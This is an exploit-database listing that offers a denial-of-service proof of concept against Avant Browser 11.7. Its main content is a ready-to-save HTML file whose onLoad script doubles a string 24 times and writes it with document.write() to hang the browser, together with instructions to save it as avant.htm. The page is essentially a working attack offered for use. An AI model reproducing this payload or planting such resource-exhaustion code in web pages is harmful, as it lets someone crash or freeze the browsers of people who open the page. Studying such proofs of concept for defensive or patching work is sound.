[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Avant Browser Denial of Service

Author
t3rm!n4t0r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13306
Category
dos / poc
Date add
12-07-2010
Platform
windows
===============================
Avant Browser Denial of Service
===============================


##########################################################"
##       Legion of Xtremers & Hackers Garage                                                                                    
##       (www.loxian.co.cc)   (www.garage4hackers.com)                                                  
##                    Avant Browser DoS
##                 Version:- Avant Browser 11.7 Build 46
##            http://www.avantbrowser.com/download.html
##		   
##               Author: Prashant a.k.a t3rm!n4t0r						    
##           	c0ntact: happyterminator@gmail.com					   
##                                   				  
##  Greetz to: vinnu, b0nd, fb1h2s, Anarki, Nikhil, D4RK3ST      				     			
##     			               
"#########################################################"



--> save file as "avant.htm"

--> The br0wser gets hang on opening this file because of plenitude String in
    document.write() function

--------------------------------------------------------------------------------------

<html>
<title>Legion Of Xtremers/Hackers Garage</title>

<head>
 
<script>
      
     
     
function prashant ()
 {
    var i=24 , aaaaaaaa = "XXXX"
    for(i=24;i >0 ;--i)
 {
        aaaaaaaa=aaaaaaaa+aaaaaaaa;
    }
     
    document.write(aaaaaaaa);
 
   
   
}
 
</script>
</head>
 
<body onLoad="prashant()"></body>
</html>




#  0day.today [2024-11-15]  #